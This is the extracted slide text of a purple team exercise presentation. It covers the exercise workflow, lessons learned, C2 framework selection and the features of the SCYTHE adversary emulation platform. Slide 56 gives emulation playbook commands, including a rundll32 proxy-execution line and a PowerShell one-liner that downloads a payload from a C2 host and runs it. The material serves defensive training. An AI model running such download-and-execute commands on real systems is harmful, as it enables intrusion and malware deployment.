  • 45. @teschulz Exercise Flow 3. Red Team executes the TTP ○ Provides attacker IP ○ Provides target ○ Provides exact time ○ Shows the attack on projector 4. SOC, Hunt, and DFIR follow process to identify evidence of TTP ○ Time should be monitored to meet expectation and move exercise along 45
  • 46. @teschulz Exercise Flow 5. Share screen if TTP was identified, received alert, logs, or forensics a. Time to detect b. Time to receive alert c. Red Team stops TTP d. Show on screen TTP evidence stopped e. Red Team runs TTP again 6. Document results - what worked and what did not 7. Are there any short term adjustments that can increase visibility? a. Implement adjustment b. Red Team repeats TTP 8. Document any feedback and/or Action Items for TTP 9. Repeat for next TTP 46
  • 48. @teschulz Lessons Learned ● At least one dedicated Exercise Coordinator should be assigned to take minutes, notes, action items, and feedback ● Daily emails should be sent to all attendees and sponsors with minutes, action items, and plan for the next day ● The Exercise Coordinator is responsible for the creation of a Lessons Learned document following each exercise ● A feedback request should be sent to all attendees on the last day of the Purple Team Exercise to obtain immediate feedback, while it is fresh on attendee’s minds ● Lessons Learned documents should be completed and sent to Sponsors and Attendees less than 2 weeks after the exercise has concluded 48
  • 49. @teschulz Determine Tools to Use - C2 Matrix ● Google Sheet of C2s ● https://www.thec2matrix.com/ ● Find ideal C2 for your needs ● https://howto.thec2matrix.com ● SANS Slingshot C2 Matrix VM ● @C2_Matrix 49
  • 50. @teschulz SCYTHE ● Enterprise-Grade platform for Adversary Emulation ○ Creating custom, controlled, synthetic malware ○ Can be deployed on-premises or your cloud (does not call home) ● Emulate known threat actors against an enterprise network ○ Consistently execute adversary behaviors (TTPs) ○ Continually assess security controls ○ Decreased evaluation time of security technologies ○ Identify blind spots for blue teams ○ Force-multiplier for red team resources ○ Measure and improve response of people and process 50
  • 51. @teschulz Features & Capabilities ● Enterprise Command and Control (C2) ○ HTTP(S), DNS, SMB, Twitter, Stego ● Automation ○ Build cross-platform synthetic malware (Windows, Linux, macOS) ○ Emulate chosen adversary behaviors (TTPs) consistently ● Largest, public library of Adversary Emulation Plans ○ https://github.com/scythe-io/community-threats ● Reports ○ HTML and CSV Reports ○ Executive Summary ○ ATT&CK Heat Map ○ ATT&CK Navigator JSON ● Integrations ○ Atomic Red Team ○ SIEM (Splunk and Syslog) ○ PlexTrac - automated report writing and tracking ○ VECTR - for tracking and showing value 51
  • 52. @teschulz NEW: Client Host (Stage 1) 52 ● Mature organizations are implementing application control (allow-listing) ● Our customers operate under “Assume Breach” ○ Initial Access will occur at some point ○ Instead of fighting against AV and EDR for execution, why not allow-list the initial execution? ● Client Host a.k.a. Stage 1 Executable ○ Single binary that can be used to start any other campaign/threat ○ Can be allow-listed ○ Can be signed with organization’s code signing cert! ○ Can only run/connect to respective customer SCYTHE instance
  • 53. @teschulz NEW: Navigator & NIST-800 Mapping ● Exporting campaigns to ATT&CK Navigator JSON now current (v8 and v4.1) ● Added new report for MITRE ATT&CK to NIST-800 Mapping 53
  • 54. @teschulz NEW: Create your own Techniques ● You can create custom modules: ○ https://github.com/scythe-io/sdk ● You can create custom threats (attack chains) ● Now you can create and save custom techniques! 54
  • 55. @teschulz Other new features ● Single Sign On (SSO) via OpenID Connect ● When elevating privileges, new flag to either kill original process or not ● Added support for Linux payloads in “hardened” environments ● Added additional proxy support flags for Windows 55
  • 56. @teschulz Playbooks Create Campaigns in SCYTHE beforehand ● HTTPS - 10 second heartbeat ○ User Execution: Malicious File (T1204.002) ● Orangeworm ○ Signed Binary Proxy Execution: Rundll32 (T1218.011) ■ rundll32.exe ServiceLogin.dll,PlatformClientMain ● Ryuk ○ Command and Scripting Interpreter: PowerShell (T1059.001) ■ $myscriptblock={$url="https://scythe/ServiceLogin?active=xdHu2K8hG0yvEzMMC-AR7 g&b=false";$wc=New-Object System.Net.WebClient;$output="C:UsersPublicscythe_payload.exe";$wc.DownloadFil e($url,$output);C:UsersPublicscythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock; 56
  • 58. @teschulz 58 Save the Date - Friday, April 9, 2021 Come hear the best from our clients and friends at our second annual UniCon. UniCon is a free conference for the entire purple team: security researchers, developers, red teamers, blue teamers, and digital forensics and incident responders.